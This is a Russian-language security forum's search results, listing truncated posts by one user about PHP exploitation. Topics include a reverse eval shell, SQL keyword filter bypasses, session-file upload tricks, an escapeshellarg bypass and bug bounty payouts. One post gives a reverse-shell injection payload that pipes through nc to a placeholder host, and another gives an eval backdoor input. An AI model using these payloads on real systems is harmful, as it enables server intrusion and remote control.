Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 223.
На поиск затрачено 0.01 сек.
Поиск: Сообщения от: d0znpp
Раздел: Релизы/Releases 08.04.2015, 05:58
Ответов: 1
Просмотров: 10,743
Автор d0znpp
PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec() и подобному.

Использует только fsockopen и eval
Форкается если есть pcntl_fork



set_time_limit(0);
if...
Раздел: Статьи/Articles 06.05.2014, 12:09
Ответов: 16
Просмотров: 42,590
Автор d0znpp
1. pickle в отличии от РНР вообще сразу дает RCE,...

1. pickle в отличии от РНР вообще сразу дает RCE, так как поддерживает десериализацию кода - https://blog.nelhage.com/2011/03/exploiting-pickle/

2. java при десериализации можно порой указать свой...
Раздел: Web-среда/Web-applications 26.07.2013, 17:20
Ответов: 3,618
Просмотров: 2,101,594
Автор d0znpp
она во внутренней сети и ничем не поможет тебе,...

она во внутренней сети и ничем не поможет тебе, напиши, какой вектор атаки хочешь развернуть в итоге?
Может, есть смысл писать триггеры сразу: http://www.wisec.it/sectou.php?p=1
Раздел: Повышение привилегий/Privilege escalation 06.06.2013, 10:14
Ответов: 11
Просмотров: 12,495
Автор d0znpp
это выглядит как фейк :) особенно странно, что...

это выглядит как фейк :)
особенно странно, что ничего про версии не пишут, как понимаю, сейчас на nginx все вообще)

Ключ тут:

Кто потестит - отпишите, у меня по нулям все пока
...
Раздел: Мировые новости/World news 03.05.2013, 01:11
Ответов: 0
Просмотров: 6,706
Автор d0znpp
PHDays 2013 hackquest

Кто еще не в курсе, вот здесь:
hackquest.phdays.com (http://hackquest.phdays.com)

розыгрываются 20 билетов и 20 фирменных футболок PHDays 2013, который пройдет в Москве 23-24 мая

Всем удачи!
Раздел: Web-среда/Web-applications 25.04.2013, 19:10
Ответов: 3,618
Просмотров: 2,101,594
Автор d0znpp
прочитай cfg.php залезь через бэкдор в админку...

прочитай cfg.php
залезь через бэкдор в админку - _authChkUser_
погляди что делает ChkUser
Раздел: Уязвимости PHP/PHP vulnerabilities 03.04.2013, 13:19
Ответов: 4
Просмотров: 11,046
Автор d0znpp
Exploiting restricted uploaders In many...

Exploiting restricted uploaders

In many cases uploader vulns restricted by filesystem privileges.
You can upload arbitrary files in /tmp directory, but can't upload into /var/www and others.
...
Раздел: Уязвимости PHP/PHP vulnerabilities 02.04.2013, 12:53
Ответов: 4
Просмотров: 11,046
Автор d0znpp
думаю, что это можно спускать, если нету...

думаю, что это можно спускать, если нету обсуждения здесь
Раздел: Уязвимости PHP/PHP vulnerabilities 31.03.2013, 22:04
Ответов: 4
Просмотров: 11,046
Автор d0znpp
Эксплуатация ограниченных писалок через PHP сессии

Часто бывают случаи, когда надо проэксплуатировать ограниченные по правам аплоадеры и прочие штуки.
Для этого хорошо подходят файлы сессий, так как они располагаются в писабельной зоне (обычно /tmp)...
Раздел: Уязвимости PHP/PHP vulnerabilities 24.03.2013, 22:29
Ответов: 1
Просмотров: 11,846
Автор d0znpp
можно спускать, блогпост готов

можно спускать, блогпост готов
Раздел: Уязвимости PHP/PHP vulnerabilities 15.03.2013, 02:29
Ответов: 1
Просмотров: 11,846
Автор d0znpp
PHP escapeshellarg bypass 0day :)

Очевидная и действенная мера.
В РНР нет способа штатными средствами защититься от атак RCE через вызов exec консольных утилит, которые парсят параметры.
То есть escapeshellarg корректно делает из...
Раздел: Windows 13.03.2013, 21:34
Ответов: 12
Просмотров: 15,241
Автор d0znpp
начни с того, чтобы понять с чем имеешь дело ...

начни с того, чтобы понять с чем имеешь дело

- если это шифр - надо узнать какой, проще всего это сделать найдя программу, которой он был создан (зашифрован)
- можешь также попробовать...
Раздел: Web-среда/Web-applications 11.03.2013, 23:56
Ответов: 3,618
Просмотров: 2,101,594
Автор d0znpp
frOM FR/**/OM #text%0aFROM%0a или...

frOM
FR/**/OM
#text%0aFROM%0a

или использовать JOIN
Раздел: Web-среда/Web-applications 03.03.2013, 07:39
Ответов: 11
Просмотров: 15,622
Автор d0znpp
отличный вариант! у меня был nc, но не было / в...

отличный вариант! у меня был nc, но не было / в жизни
Раздел: Web-среда/Web-applications 03.03.2013, 07:35
Ответов: 11
Просмотров: 15,622
Автор d0znpp
l1ght, b3, спасибо вам, вы поняли задачу! ...

l1ght, b3, спасибо вам, вы поняли задачу!

Еще раз для уточнения - ищется sh-based shell, то есть RCE готовая, но надо прокинуть шелл в одну команду.
В жизни очень часто бывает, когда твои кластер...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 01.03.2013, 15:23
Ответов: 11
Просмотров: 27,573
Автор d0znpp
Она работает в MySQL клиенте под PHP, ей вообще...

Она работает в MySQL клиенте под PHP, ей вообще пофигу на MySQL сервепр почти. Файло чистается с правами PHP.

Сначала был mysqli, потом mysqlnd стал (5.3 точно по-дефолту, раньше как настроишь). В...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 01.03.2013, 14:00
Ответов: 11
Просмотров: 27,573
Автор d0znpp
Оно вообще не работает, когда open_basedir хоть...

Оно вообще не работает, когда open_basedir хоть как-то настроен, кроме отключенного
https://bugs.php.net/bug.php?id=55737
Раздел: Web-среда/Web-applications 28.02.2013, 13:28
Ответов: 11
Просмотров: 15,622
Автор d0znpp
ну и как ты это пропихнешь через готовый system...

ну и как ты это пропихнешь через готовый system вызов? это РНР шелл, а я про шелл из команд ОС
Раздел: Web-среда/Web-applications 28.02.2013, 12:26
Ответов: 11
Просмотров: 15,622
Автор d0znpp
Короткий шелл

Задался целью написания короткого шелла для RCE типа

system("stat {$_GET['a']}");



пока самый простой вариант:

|nc evil.com 12345|sh|
Раздел: Оффтоп/Offtopic 27.02.2013, 18:13
Ответов: 6
Просмотров: 9,612
Автор d0znpp
купил нерабочий сплоит - проси назад деньги,...

купил нерабочий сплоит - проси назад деньги, договор оферты и все такое :)))
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 27.02.2013, 09:13
Ответов: 11
Просмотров: 27,573
Автор d0znpp
Допы - до 6ки оно включено на стороне сервера...

Допы
- до 6ки оно включено на стороне сервера (последние 5ки тоже выключены, не отследил)
- на стороне клиента включается в каждом конкретном случае по-своему, для РНР чаще всего включено
- чтение...
Раздел: Web-среда/Web-applications 19.02.2013, 17:38
Ответов: 3,618
Просмотров: 2,101,594
Автор d0znpp
Похоже, что это фильтр на входные данные рубит. ...

Похоже, что это фильтр на входные данные рубит.

eval(str_rot13($_REQUEST[command]))


?command=ez+-es+.
Раздел: Уязвимости PHP/PHP vulnerabilities 09.01.2013, 18:46
Ответов: 8
Просмотров: 8,426
Автор d0znpp
Пора спускать, уже опубликовано в Хакере в статье...

Пора спускать, уже опубликовано в Хакере в статье про случайные числа
Раздел: Мировые новости/World news 27.12.2012, 19:02
Ответов: 54
Просмотров: 46,133
Автор d0znpp
Отспорил багу и поднял стоимость 25к до 30к....

Отспорил багу и поднял стоимость 25к до 30к. Вполне себе отспарывает за два-три письма с аргументами.
На очереди еще 3-4 баги поднять с 20к до 25к.
Раздел: Мировые новости/World news 23.12.2012, 21:42
Ответов: 54
Просмотров: 46,133
Автор d0znpp
Под НГ явно активизировались ответственные: ...

Под НГ явно активизировались ответственные:

6 уязвимостей оценено:
(25+25+25+25+20+5)к руб.
11 уязвимостей не оценено
4 оплачено: (25+25+25+5)к руб.

Автоответ стал приходит мгновенно, разбор...
Показано с 1 по 25 из 223.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot